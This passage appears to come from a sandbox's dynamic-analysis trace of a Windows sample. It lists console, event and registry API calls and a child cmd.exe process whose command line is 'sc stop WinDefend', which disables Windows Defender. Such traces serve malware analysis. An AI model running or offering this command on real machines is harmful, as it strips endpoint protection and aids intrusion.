	[0043.926] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0043.926] GetLastError () returned 0xcb
	[0043.926] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.926] GetLastError () returned 0xcb
	[0043.926] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1
	[0043.927] GetLastError () returned 0xcb
	[0043.927] CloseHandle (hObject=0x6b) returned 1
	[0043.927] GetLastError () returned 0xcb
	[0043.929] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0043.930] GetLastError () returned 0xcb
	[0043.930] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x573ef4c | out: lpMode=0x573ef4c) returned 1
	[0043.930] GetLastError () returned 0xcb
	[0043.930] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x228224c*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x573ef4c, lpReserved=0x0 | out: lpBuffer=0x228224c*, lpNumberOfCharsWritten=0x573ef4c*=0x19) returned 1
	[0043.930] GetLastError () returned 0xcb
	[0043.930] CloseHandle (hObject=0x6b) returned 1
	[0043.931] GetLastError () returned 0xcb
	[0043.933] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0043.933] GetLastError () returned 0xcb
	[0043.933] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0043.933] GetLastError () returned 0xcb
	[0043.933] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1
	[0043.934] GetLastError () returned 0xcb
	[0043.934] CloseHandle (hObject=0x6b) returned 1
	[0043.934] GetLastError () returned 0xcb
	[0043.936] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0043.937] GetLastError () returned 0xcb
	[0043.937] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0043.937] GetLastError () returned 0xcb
	[0043.937] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1
	[0043.937] GetLastError () returned 0xcb
	[0043.937] CloseHandle (hObject=0x6b) returned 1
	[0043.940] GetLastError () returned 0xcb
	[0043.943] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0043.943] GetLastError () returned 0xcb
	[0043.943] GetConsoleMode (in: hConsoleHandle=0x6b, lpMode=0x573ef8c | out: lpMode=0x573ef8c) returned 1
	[0043.943] GetLastError () returned 0xcb
	[0043.943] WriteConsoleW (in: hConsoleOutput=0x6b, lpBuffer=0x1fc9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x573ef8c, lpReserved=0x0 | out: lpBuffer=0x1fc9938*, lpNumberOfCharsWritten=0x573ef8c*=0x1) returned 1
	[0043.943] GetLastError () returned 0xcb
	[0043.943] CloseHandle (hObject=0x6b) returned 1
	[0043.943] GetLastError () returned 0xcb
	[0043.946] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b
	[0043.946] GetLastError () returned 0xcb
	[0043.946] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x573ef58 | out: lpConsoleScreenBufferInfo=0x573ef58) returned 1
	[0043.947] GetLastError () returned 0xcb
	[0043.947] GetConsoleOutputCP () returned 0x1b5
	[0043.947] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.947] GetLastError () returned 0xcb
	[0043.949] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f
	[0043.950] GetLastError () returned 0xcb
	[0043.950] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6f, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.950] GetLastError () returned 0xcb
	[0043.953] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x73
	[0043.953] GetLastError () returned 0xcb
	[0043.953] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x73, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.953] GetLastError () returned 0xcb
	[0043.956] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0043.956] GetLastError () returned 0xcb
	[0043.956] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.956] GetLastError () returned 0xcb
	[0043.956] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1
	[0043.956] GetLastError () returned 0xcb
	[0043.956] CloseHandle (hObject=0x77) returned 1
	[0043.957] GetLastError () returned 0xcb
	[0043.960] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0043.960] GetLastError () returned 0xcb
	[0043.960] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.961] GetLastError () returned 0xcb
	[0043.961] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1
	[0043.961] GetLastError () returned 0xcb
	[0043.961] CloseHandle (hObject=0x77) returned 1
	[0043.961] GetLastError () returned 0xcb
	[0043.964] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0043.964] GetLastError () returned 0xcb
	[0043.964] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x573ef4c | out: lpMode=0x573ef4c) returned 1
	[0043.964] GetLastError () returned 0xcb
	[0043.964] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x22825e4*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x573ef4c, lpReserved=0x0 | out: lpBuffer=0x22825e4*, lpNumberOfCharsWritten=0x573ef4c*=0x36) returned 1
	[0043.965] GetLastError () returned 0xcb
	[0043.965] CloseHandle (hObject=0x77) returned 1
	[0043.965] GetLastError () returned 0xcb
	[0043.968] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0043.968] GetLastError () returned 0xcb
	[0043.968] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0043.968] GetLastError () returned 0xcb
	[0043.968] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1
	[0043.969] GetLastError () returned 0xcb
	[0043.969] CloseHandle (hObject=0x77) returned 1
	[0043.969] GetLastError () returned 0xcb
	[0043.972] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0043.972] GetLastError () returned 0xcb
	[0043.972] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0043.972] GetLastError () returned 0xcb
	[0043.972] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1
	[0043.973] GetLastError () returned 0xcb
	[0043.973] CloseHandle (hObject=0x77) returned 1
	[0043.973] GetLastError () returned 0xcb
	[0043.976] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0043.977] GetLastError () returned 0xcb
	[0043.977] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x573ef8c | out: lpMode=0x573ef8c) returned 1
	[0043.977] GetLastError () returned 0xcb
	[0043.977] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x1fc9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x573ef8c, lpReserved=0x0 | out: lpBuffer=0x1fc9938*, lpNumberOfCharsWritten=0x573ef8c*=0x1) returned 1
	[0043.977] GetLastError () returned 0xcb
	[0043.977] CloseHandle (hObject=0x77) returned 1
	[0043.978] GetLastError () returned 0xcb
	[0043.981] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77
	[0043.982] GetLastError () returned 0xcb
	[0043.982] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x573ef58 | out: lpConsoleScreenBufferInfo=0x573ef58) returned 1
	[0043.982] GetLastError () returned 0xcb
	[0043.982] GetConsoleOutputCP () returned 0x1b5
	[0043.982] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x573ef60, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x573ef60) returned 0
	[0043.982] GetLastError () returned 0xcb
	[0043.986] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b
	[0043.986] GetLastError () returned 0xcb
	[0043.986] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7b, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.986] GetLastError () returned 0xcb
	[0043.990] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7f
	[0043.990] GetLastError () returned 0xcb
	[0043.990] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7f, lpConsoleScreenBufferInfo=0x573eef8 | out: lpConsoleScreenBufferInfo=0x573eef8) returned 1
	[0043.990] GetLastError () returned 0xcb
	[0043.993] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0043.994] GetLastError () returned 0xcb
	[0043.994] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.994] GetLastError () returned 0xcb
	[0043.994] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1
	[0043.995] GetLastError () returned 0xcb
	[0043.995] CloseHandle (hObject=0x83) returned 1
	[0043.995] GetLastError () returned 0xcb
	[0043.998] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0043.999] GetLastError () returned 0xcb
	[0043.999] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x573ef00 | out: lpConsoleScreenBufferInfo=0x573ef00) returned 1
	[0043.999] GetLastError () returned 0xcb
	[0043.999] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1
	[0043.999] GetLastError () returned 0xcb
	[0043.999] CloseHandle (hObject=0x83) returned 1
	[0044.000] GetLastError () returned 0xcb
	[0044.003] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0044.007] GetLastError () returned 0xcb
	[0044.007] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x573ef4c | out: lpMode=0x573ef4c) returned 1
	[0044.007] GetLastError () returned 0xcb
	[0044.007] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x22829dc*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x573ef4c, lpReserved=0x0 | out: lpBuffer=0x22829dc*, lpNumberOfCharsWritten=0x573ef4c*=0x1) returned 1
	[0044.007] GetLastError () returned 0xcb
	[0044.007] CloseHandle (hObject=0x83) returned 1
	[0044.007] GetLastError () returned 0xcb
	[0044.011] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0044.011] GetLastError () returned 0xcb
	[0044.011] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0044.011] GetLastError () returned 0xcb
	[0044.011] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1
	[0044.011] GetLastError () returned 0xcb
	[0044.011] CloseHandle (hObject=0x83) returned 1
	[0044.012] GetLastError () returned 0xcb
	[0044.015] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0044.015] GetLastError () returned 0xcb
	[0044.015] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x573eefc | out: lpConsoleScreenBufferInfo=0x573eefc) returned 1
	[0044.015] GetLastError () returned 0xcb
	[0044.015] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1
	[0044.015] GetLastError () returned 0xcb
	[0044.015] CloseHandle (hObject=0x83) returned 1
	[0044.016] GetLastError () returned 0xcb
	[0044.018] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83
	[0044.019] GetLastError () returned 0xcb
	[0044.019] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x573ef8c | out: lpMode=0x573ef8c) returned 1
	[0044.019] GetLastError () returned 0xcb
	[0044.019] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x1fc9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x573ef8c, lpReserved=0x0 | out: lpBuffer=0x1fc9938*, lpNumberOfCharsWritten=0x573ef8c*=0x1) returned 1
	[0044.019] GetLastError () returned 0xcb
	[0044.019] CloseHandle (hObject=0x83) returned 1
	[0044.019] GetLastError () returned 0xcb
	[0044.027] SetEvent (hEvent=0x394) returned 1
	[0044.027] GetLastError () returned 0xcb
	[0044.027] SetEvent (hEvent=0x38c) returned 1
	[0044.027] GetLastError () returned 0xcb
	[0044.027] SetEvent (hEvent=0x3a8) returned 1
	[0044.027] GetLastError () returned 0xcb
	[0044.027] SetEvent (hEvent=0x374) returned 1
	[0044.027] GetLastError () returned 0xcb
	[0044.027] SetEvent (hEvent=0x324) returned 1
	[0044.027] GetLastError () returned 0xcb
	[0044.027] SetEvent (hEvent=0x398) returned 1
	[0044.027] GetLastError () returned 0xcb
	[0044.028] SetEvent (hEvent=0x300) returned 1
	[0044.028] GetLastError () returned 0xcb
	[0044.028] SetEvent (hEvent=0x304) returned 1
	[0044.028] GetLastError () returned 0xcb
	[0044.028] SetEvent (hEvent=0x334) returned 1
	[0044.028] GetLastError () returned 0xcb
	[0044.028] CoUninitialize () 

Thread:
	id = 22
	os_tid = 0xe1c

	[0044.067] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0044.123] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0044.124] VirtualQuery (in: lpAddress=0x62cdfc0, lpBuffer=0x62cefc0, dwLength=0x1c | out: lpBuffer=0x62cefc0*(BaseAddress=0x62cd000, AllocationBase=0x5940000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0044.124] VirtualQuery (in: lpAddress=0x62ce0dc, lpBuffer=0x62cf0dc, dwLength=0x1c | out: lpBuffer=0x62cf0dc*(BaseAddress=0x62ce000, AllocationBase=0x5940000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0044.126] SetEvent (hEvent=0x390) returned 1
	[0044.126] GetLastError () returned 0x0
	[0044.126] SetEvent (hEvent=0x3b0) returned 1
	[0044.126] GetLastError () returned 0x0
	[0044.126] SetEvent (hEvent=0x3b8) returned 1
	[0044.126] GetLastError () returned 0x0
	[0044.126] SetEvent (hEvent=0x390) returned 1
	[0044.126] GetLastError () returned 0x0
	[0044.126] SetEvent (hEvent=0x3b0) returned 1
	[0044.126] GetLastError () returned 0x0
	[0044.126] SetEvent (hEvent=0x3c8) returned 1
	[0044.126] GetLastError () returned 0x0
	[0044.126] SetEvent (hEvent=0x3bc) returned 1
	[0044.126] GetLastError () returned 0x0
	[0044.126] SetEvent (hEvent=0x3c0) returned 1
	[0044.126] GetLastError () returned 0x0
	[0044.126] SetEvent (hEvent=0x3c4) returned 1
	[0044.126] GetLastError () returned 0x0
	[0044.127] SetEvent (hEvent=0x3cc) returned 1
	[0044.127] GetLastError () returned 0x0
	[0044.141] CoUninitialize () 

Process:
	id = "8"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee17400"
	os_pid = "0xeb8"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xd50"
	cmd_line = "/c sc stop WinDefend"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 24
	os_tid = 0xebc

	[0045.343] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x29fcd8 | out: lpSystemTimeAsFileTime=0x29fcd8*(dwLowDateTime=0x6dfb140, dwHighDateTime=0x1d50a6a)) 
	[0045.343] GetCurrentProcessId () returned 0xeb8
	[0045.343] GetCurrentThreadId () returned 0xebc
	[0045.343] GetTickCount () returned 0xa642fb
	[0045.343] QueryPerformanceCounter (in: lpPerformanceCount=0x29fcd0 | out: lpPerformanceCount=0x29fcd0*=11918099119) returned 1
	[0045.344] GetModuleHandleA (lpModuleName=0x0) returned 0x49d60000
	[0045.344] __set_app_type (_Type=0x1) 
	[0045.344] __p__fmode () returned 0x770231f4
	[0045.344] __p__commode () returned 0x770231fc
	[0045.344] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49d821a6) returned 0x0
	[0045.344] __getmainargs (in: _Argc=0x49d84238, _Argv=0x49d84240, _Env=0x49d8423c, _DoWildCard=0, _StartInfo=0x49d84140 | out: _Argc=0x49d84238, _Argv=0x49d84240, _Env=0x49d8423c) returned 0
	[0045.344] GetCurrentThreadId () returned 0xebc
	[0045.345] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xebc) returned 0x38
	[0045.345] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0045.345] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0045.345] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0045.345] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0045.345] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x29fc68 | out: phkResult=0x29fc68*=0x0) returned 0x2
	[0045.345] VirtualQuery (in: lpAddress=0x29fc9f, lpBuffer=0x29fc38, dwLength=0x1c | out: lpBuffer=0x29fc38*(BaseAddress=0x29f000, AllocationBase=0x1a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0045.345] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x29fc38, dwLength=0x1c | out: lpBuffer=0x29fc38*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0045.345] VirtualQuery (in: lpAddress=0x1a1000, lpBuffer=0x29fc38, dwLength=0x1c | out: lpBuffer=0x29fc38*(BaseAddress=0x1a1000, AllocationBase=0x1a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0045.345] VirtualQuery (in: lpAddress=0x1a3000, lpBuffer=0x29fc38, dwLength=0x1c | out: lpBuffer=0x29fc38*(BaseAddress=0x1a3000, AllocationBase=0x1a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0045.345] VirtualQuery (in: lpAddress=0x2a0000, lpBuffer=0x29fc38, dwLength=0x1c | out: lpBuffer=0x29fc38*(BaseAddress=0x2a0000, AllocationBase=0x2a0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
	[0045.345] GetConsoleOutputCP () returned 0x1b5
	[0045.345] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d84260 | out: lpCPInfo=0x49d84260) returned 1
	[0045.346] SetConsoleCtrlHandler (HandlerRoutine=0x49d7e72a, Add=1) returned 1
	[0045.346] _get_osfhandle (_FileHandle=1) returned 0x7
	[0045.346] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0045.346] _get_osfhandle (_FileHandle=1) returned 0x7
	[0045.346] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49d841ac | out: lpMode=0x49d841ac) returned 1
	[0045.346] _get_osfhandle (_FileHandle=1) returned 0x7
	[0045.346] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0045.346] _get_osfhandle (_FileHandle=0) returned 0x3
	[0045.346] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49d841b0 | out: lpMode=0x49d841b0) returned 1
	[0045.347] _get_osfhandle (_FileHandle=0) returned 0x3
	[0045.347] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0045.347] GetEnvironmentStringsW () returned 0x470238*
	[0045.347] GetProcessHeap () returned 0x460000
	[0045.347] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x932) returned 0x470b78
	[0045.347] FreeEnvironmentStringsW (penv=0x470238) returned 1
	[0045.347] GetProcessHeap () returned 0x460000
	[0045.347] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4) returned 0x46fb38
	[0045.347] GetEnvironmentStringsW () returned 0x470238*
	[0045.347] GetProcessHeap () returned 0x460000
	[0045.347] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x932) returned 0x4714b8
	[0045.347] FreeEnvironmentStringsW (penv=0x470238) returned 1
	[0045.347] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x29ebd8 | out: phkResult=0x29ebd8*=0x40) returned 0x0
	[0045.348] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x29ebe0, lpData=0x29ebe4, lpcbData=0x29ebdc*=0x1000 | out: lpType=0x29ebe0*=0x0, lpData=0x29ebe4*=0xc8, lpcbData=0x29ebdc*=0x1000) returned 0x2
	[0045.348] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x29ebe0, lpData=0x29ebe4, lpcbData=0x29ebdc*=0x1000 | out: lpType=0x29ebe0*=0x4, lpData=0x29ebe4*=0x1, lpcbData=0x29ebdc*=0x4) returned 0x0
	[0045.348] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x29ebe0, lpData=0x29ebe4, lpcbData=0x29ebdc*=0x1000 | out: lpType=0x29ebe0*=0x0, lpData=0x29ebe4*=0x1, lpcbData=0x29ebdc*=0x1000) returned 0x2
	[0045.348] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x29ebe0, lpData=0x29ebe4, lpcbData=0x29ebdc*=0x1000 | out: lpType=0x29ebe0*=0x4, lpData=0x29ebe4*=0x0, lpcbData=0x29ebdc*=0x4) returned 0x0
	[0045.348] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x29ebe0, lpData=0x29ebe4, lpcbData=0x29ebdc*=0x1000 | out: lpType=0x29ebe0*=0x4, lpData=0x29ebe4*=0x40, lpcbData=0x29ebdc*=0x4) returned 0x0
	[0045.348] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x29ebe0, lpData=0x29ebe4, lpcbData=0x29ebdc*=0x1000 | out: lpType=0x29ebe0*=0x4, lpData=0x29ebe4*=0x40, lpcbData=0x29ebdc*=0x4) returned 0x0
	[0045.348] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x29ebe0, lpData=0x29ebe4, lpcbData=0x29ebdc*=0x1000 | out: lpType=0x29ebe0*=0x0, lpData=0x29ebe4*=0x40, lpcbData=0x29ebdc*=0x1000) returned 0x2
	[0045.348] RegCloseKey (hKey=0x40) returned 0x0
	[0045.348] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x29ebd8 | out: phkResult=0x29ebd8*=0x40) returned 0x0
	[0045.348] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x29ebe0, lpData=0x29ebe4, lpcbData=0x29ebdc*=0x1000 | out: lpType=0x29ebe0*=0x0, lpData=0x29ebe4*=0x40, lpcbData=0x29ebdc*=0x1000) returned 0x2
